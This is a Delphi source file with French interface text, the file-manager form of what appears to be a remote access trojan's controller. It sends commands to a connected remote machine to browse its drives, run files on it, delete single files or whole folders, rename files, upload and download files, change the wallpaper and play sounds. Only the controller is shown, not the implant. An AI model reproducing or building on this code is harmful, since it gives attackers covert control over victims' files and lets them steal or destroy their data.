(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untFileManager.pas                              ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of FileManager form                 ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untFileManager;

interface

uses
  Windows, SysUtils, Classes, Controls, Forms, Buttons,
  ComCtrls, StdCtrls, ImgList, Dialogs;

type
  TfrmFileManager = class(TForm)
    EdtHistoric: TEdit;
    LvwFiles: TListView;
    SpdCreateDir: TSpeedButton;
    SpdRename: TSpeedButton;
    SpdPlayWav: TSpeedButton;
    SpdSetWallpaper: TSpeedButton;
    SpdGetSize: TSpeedButton;
    SpdDeleteAll: TSpeedButton;
    SpdDelete: TSpeedButton;
    SpdRun: TSpeedButton;
    SpdShowPath: TSpeedButton;
    SpdGetDrives: TSpeedButton;
    SpdRefreshFiles: TSpeedButton;
    SpdRoot: TSpeedButton;
    ImgsFiles: TImageList;
    SpdDownload: TSpeedButton;
    SpdUpload: TSpeedButton;
    OpnDlg: TOpenDialog;
    CboDrives: TComboBox;
    SpdGo: TSpeedButton;
    procedure SpdRootClick(Sender: TObject);
    procedure SpdRefreshFilesClick(Sender: TObject);
    procedure SpdGetDrivesClick(Sender: TObject);
    procedure SpdShowPathClick(Sender: TObject);
    procedure SpdRunClick(Sender: TObject);
    procedure SpdDeleteClick(Sender: TObject);
    procedure SpdDeleteAllClick(Sender: TObject);
    procedure SpdGetSizeClick(Sender: TObject);
    procedure SpdSetWallpaperClick(Sender: TObject);
    procedure SpdPlayWavClick(Sender: TObject);
    procedure SpdRenameClick(Sender: TObject);
    procedure SpdCreateDirClick(Sender: TObject);
    function CanManipulate(var fName:string; var acceptFld:boolean):Boolean;
    function AjustFolder(strFolder:string):string;
    procedure LvwFilesDblClick(Sender: TObject);
    function GetParentFolder(strFolder:string):string;
    procedure FormCreate(Sender: TObject);
    procedure ShowFiles(Data:string);
    procedure SpdDownloadClick(Sender: TObject);
    procedure SpdUploadClick(Sender: TObject);
    procedure SpdGoClick(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmFileManager: TfrmFileManager;

function MyDirectoryExists(const Name: string): Boolean;

implementation

uses untMain, untCommands, untTransfer;
{$R *.DFM}

function MyDirectoryExists(const Name: string): Boolean;
var
   Code: Integer;
begin
   Code := GetFileAttributes(PChar(Name));
   Result := (Code <> -1) and (FILE_ATTRIBUTE_DIRECTORY and Code <> 0);
end;

procedure TfrmFileManager.SpdRootClick(Sender: TObject);
begin
   LvwFiles.Items.Clear;
   EdtHistoric.Text:='';
   frmMain.strStatus:='Rception des partitions...';
   frmMain.SendCommand(COMMAND_REFRESH_ROOT,'');
end;

procedure TfrmFileManager.SpdRefreshFilesClick(Sender: TObject);
begin
   if Trim(EdtHistoric.Text) = '' then
   begin
      SpdRootClick(SpdRoot);
      Exit;
   end;
   LvwFiles.Items.Clear;
   frmMain.strStatus:='Rception...';
   frmMain.SendCommand(COMMAND_REFRESH_FOLDER,EdtHistoric.Text);
   EdtHistoric.Text:='';
end;

procedure TfrmFileManager.SpdGetDrivesClick(Sender: TObject);
begin
   frmMain.strStatus:='Rception des partitions...';
   frmMain.SendCommand(COMMAND_GET_DRIVES,'');
end;

procedure TfrmFileManager.SpdShowPathClick(Sender: TObject);
var
   nPath:string;
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('pas connect...');
      Exit;
   end;
   if InputQuery(frmMain.Caption,'Nom du dossier:',nPath) then
   begin
      LvwFiles.Items.Clear;
      frmMain.strStatus:='Rception...';
      frmMain.SendCommand(COMMAND_REFRESH_FOLDER,nPath);
   end;
end;

procedure TfrmFileManager.SpdRunClick(Sender: TObject);
var
   cFile:string;
   boolF:Boolean;
begin
   boolF:=False;
   if not CanManipulate(cFile,boolF) then Exit;
   frmMain.strStatus:='Excution...';
   frmMain.SendCommand(COMMAND_RUN,cFile);
end;

procedure TfrmFileManager.SpdDeleteClick(Sender: TObject);
var
   cFile,Msg:string;
   boolF:Boolean;
begin
   boolF:=True;
   if CanManipulate(cFile,boolF) then
   begin
      if boolF then
      begin
         Msg:='Effacer le dossier ' + LvwFiles.Selected.Caption + '. sure?';
         if MessageBox(handle,PChar(Msg),PChar(frmMain.Caption),MB_ICONQUESTION or MB_YESNO) = IDYES then
         begin
            frmMain.strStatus:='Effacage...';
            frmMain.SendCommand(COMMAND_DELETE_FOLDER,cFile);
         end;
      end
      else
      begin
         Msg:='Effacer un fichier ' + LvwFiles.Selected.Caption + '. sure?';
         if MessageBox(handle,PChar(Msg),PChar(frmMain.Caption),MB_ICONQUESTION or MB_YESNO) = IDYES then
         begin
            frmMain.strStatus:='Effacage...';
            frmMain.SendCommand(COMMAND_DELETE,cFile);
         end;
      end;
   end;
end;

procedure TfrmFileManager.SpdDeleteAllClick(Sender: TObject);
var
   Msg:string;
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Pas connect...');
      Exit;
   end;
   EdtHistoric.Text:=Trim(EdtHistoric.Text);
   if EdtHistoric.Text <> '' then
   begin
      Msg:='Effacer tous les fichiers dans ce dossier. Etes vous sure?';
      if not MessageBox(handle,PChar(Msg),PChar(frmMain.Caption),MB_ICONQUESTION + MB_YESNO) = IDYES then
         Exit;
      frmMain.strStatus:='Effacage...';
      frmMain.SendCommand(COMMAND_DELETE_ALL,EdtHistoric.Text);
   end
   else
      frmMain.PutStatus('Please, enter in someone folder...');
end;

procedure TfrmFileManager.SpdGetSizeClick(Sender: TObject);
var
   cPath:string;
   boolF:boolean;
begin
   boolF:=False;                               
   if not CanManipulate(cPath,boolF) then Exit;
   frmMain.strStatus:='Reception...';
   frmMain.SendCommand(COMMAND_GET_SIZE,cPath);
end;

procedure TfrmFileManager.SpdRenameClick(Sender: TObject);
var
   cPath,aPath,NewPath:string;
   boolF:Boolean;
begin
   boolF:=False;
   if CanManipulate(cPath,boolF) then
   begin
      aPath:=ExtractFileName(cPath);
      if InputQuery(frmMain.Caption,'Nouveau nom:',aPath) then
      begin
         NewPath:=AjustFolder(ExtractFilePath(cPath)) + ExtractFileName(aPath);
         frmMain.strStatus:='envoit...';
         frmMain.SendCommand(COMMAND_RENAME,cPath + Chr(13) + NewPath);
      end;
   end;
end;

procedure TfrmFileManager.SpdSetWallpaperClick(Sender: TObject);
var
   cPath,fExt:string;
   boolF:Boolean;
begin
   boolF:=False;
   if CanManipulate(cPath,boolF) then
   begin
      fExt:=UpperCase(ExtractFileExt(cPath));
      if (fExt <> '.GIF') and (fExt <> '.BMP') and (fExt <> '.JPG') and (fExt <> '.JPEG') then
      begin
         frmMain.PutStatus('Choisissez une fichier image...');
         Exit;
      end;
      frmMain.strStatus:='Tentative de changer le fond d''cran...';
      frmMain.SendCommand(COMMAND_SET_WALL,cPath);
   end;
end;

procedure TfrmFileManager.SpdPlayWavClick(Sender: TObject);
var
   cPath,fExt:string;
   boolF:Boolean;
begin
   boolF:=False;
   if CanManipulate(cPath,boolF) then
   begin
      fExt:=UpperCase(ExtractFileExt(cPath));
      if (fExt <> '.WAV') then
      begin
         frmMain.PutStatus('Choissisez un fichier WAV...');
         Exit;
      end;
      frmMain.strStatus:='Ecoute wav...';
      frmMain.SendCommand(COMMAND_PLAY_WAV,cPath);
   end;
end;

procedure TfrmFileManager.SpdCreateDirClick(Sender: TObject);
var
   NewPath:string;
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Vous n''etes pas connect...');
      Exit;
   end;
   EdtHistoric.Text:=Trim(EdtHistoric.Text);
   if EdtHistoric.Text <> '' then
   begin
      if InputQuery(frmMain.Caption,'Nom du nouveau du dossier:',NewPath) then
      begin
         frmMain.strStatus:='Creation du dossier...';
         frmMain.SendCommand(COMMAND_CREATE_DIR,AjustFolder(EdtHistoric.Text) + NewPath);
      end;
   end
   else
      frmMain.PutStatus('Please, enter in someone folder...');
end;

function TfrmFileManager.CanManipulate(var fName:string; var acceptFld:boolean):Boolean;
var
   LItem:TListItem;
begin
   CanManipulate:=False;
   LItem:=LvwFiles.Selected;
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Pas connect...');
      Exit;
   end;
   if LItem = nil then
   begin
      frmMain.PutStatus('Choisir un fichier...');
      Exit;
   end
   else
      if (LItem.ImageIndex = 0) and not acceptFld then
      begin
         frmMain.PutStatus('Choisir un fichier...');
         Exit;
      end;
   acceptFld:=LItem.ImageIndex = 0;
   fName:=AjustFolder(EdtHistoric.Text) + LItem.Caption;
   CanManipulate:=True;
end;

function TfrmFileManager.AjustFolder(strFolder:string):string;
var
   l:longint;
begin
   strFolder:=Trim(strFolder);
   l:=Length(strFolder);
   if Copy(strFolder,l,l) = '\' then
      AjustFolder:=strFolder
   else
      AjustFolder:=strFolder + '\';
end;

procedure TfrmFileManager.LvwFilesDblClick(Sender: TObject);
var
   Item:TlistItem;
   path,new:string;
begin
   Item:=LvwFiles.Selected;
   if Item = nil then Exit;
   if Item.ImageIndex = 1 then Exit;
   path:=EdtHistoric.Text;
   if Item.Caption = '..' then
      new:=GetParentFolder(path)
   else
      new:=AjustFolder(path) + Item.Caption;
   LvwFiles.Items.Clear;
   EdtHistoric.Text:='';
   frmMain.strStatus:='Reception...';
   frmMain.SendCommand(COMMAND_REFRESH_FOLDER,new);
end;

function TfrmFileManager.GetParentFolder(strFolder:string):string;
var
   l:longint;
   c:string;
begin
   strFolder:=Trim(strFolder);
   l:=Length(strFolder) - 1;
   if l + 1 = 3 then
   begin
      GetParentFolder:=strFolder;
      Exit;
   end;
   repeat
   begin
      c:=Copy(strFolder,l,1);
      l:=l - 1;
   end;
   until (c = '\') or (l <=3);
   GetParentFolder:=Copy(strFolder,1,l);
end;

procedure TfrmFileManager.FormCreate(Sender: TObject);
var
   LvwWidth:Integer;
begin
   Caption:='Fichiers';
   LvwWidth:=LvwFiles.Width;
   LvwFiles.Columns.Items[0].Width:=Trunc(LvwWidth * 0.7);
   LvwFiles.Columns.Items[1].Width:=Trunc(LvwWidth * 0.2);
end;

procedure TfrmFileManager.ShowFiles(Data:string);
var
   p:longint;
   path,f,this:string;
   LItem:TListItem;
   ImgIndex:integer;
   Types:array [0..1] of string;
   NeedExit:Boolean;
begin
   LvwFiles.Items.Clear;
   f:=Chr(13);
   p:=Pos(f,Data);
   if p > 0 then
   begin
      path:=Trim(Copy(Data,1,p-1));
      NeedExit:=False;
   end
   else
   begin
      path:=Data;
      NeedExit:=True;
   end;
   if Length(path) > 3 then
   begin
      LItem:=LvwFiles.Items.Add;
      LItem.ImageIndex:=0;
      LItem.Caption:='..';
   end;
   EdtHistoric.Text:=path;
   if NeedExit then Exit;
   Data:=Copy(Data,p+1,Length(Data));
   p:=Pos(f,Data);
   Types[0]:='Dossier';
   Types[1]:='Fichier';
   EdtHistoric.Text:=path;
   while p > 0 do
   begin
      this:=Copy(Data,1,p-1);
      if Copy(this,1,1) = '\' then
      begin
         this:=Copy(this,2,Length(this));
         ImgIndex:=0;
      end
      else
         ImgIndex:=1;
      LItem:=LvwFiles.Items.Add;
      LItem.ImageIndex:=ImgIndex;
      LItem.Caption:=this;
      LItem.SubItems.Insert(0,Types[ImgIndex]);
      Data:=Copy(Data,p+1,Length(Data));
      p:=Pos(f,Data);
   end;
   if Copy(Data,1,1) = '\' then
   begin
      Data:=Copy(Data,2,Length(Data));
      ImgIndex:=0;
   end
   else
      ImgIndex:=1;
   LItem:=LvwFiles.Items.Add;
   LItem.ImageIndex:=ImgIndex;
   LItem.Caption:=Data;
   LItem.SubItems.Insert(0,Types[ImgIndex]);
   frmMain.PutStatus('termin...');
end;

procedure TfrmFileManager.SpdDownloadClick(Sender: TObject);
var
   cFile,lPath:string;
   boolF:Boolean;
begin
   boolF:=False;
   if not CanManipulate(cFile,boolF) then Exit;
   if not MyDirectoryExists(frmMain.strDownFolder) then
      GetDir(0,frmMain.strDownFolder);
   lPath:=AjustFolder(frmMain.strDownFolder) + ExtractFileName(cFile);
   frmTransfer.DoTransfer(lPath,cFile,taDownload);
end;

procedure TfrmFileManager.SpdUploadClick(Sender: TObject);
var
   rFile,lFile:string;
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('Pas connect...');
      Exit;
   end;
   if Trim(EdtHistoric.Text) = '' then
   begin
      frmMain.PutStatus('Taper la destination (path)...');
      Exit;
   end;
   if not OpnDlg.Execute then Exit;
   lFile:=OpnDlg.FileName;
   rFile:=AjustFolder(EdtHistoric.Text) + ExtractFileName(lFile);
   frmTransfer.DoTransfer(lFile,rFile,taUpload);
end;

procedure TfrmFileManager.SpdGoClick(Sender: TObject);
var
   cDrive:string;
begin
   if CboDrives.ItemIndex < 0 then Exit;
   cDrive:=Copy(CboDrives.Items[CboDrives.ItemIndex],1,3);
   LvwFiles.Items.Clear;
   frmMain.strStatus:='Rception...';
   frmMain.SendCommand(COMMAND_REFRESH_FOLDER,cDrive);
end;

end.
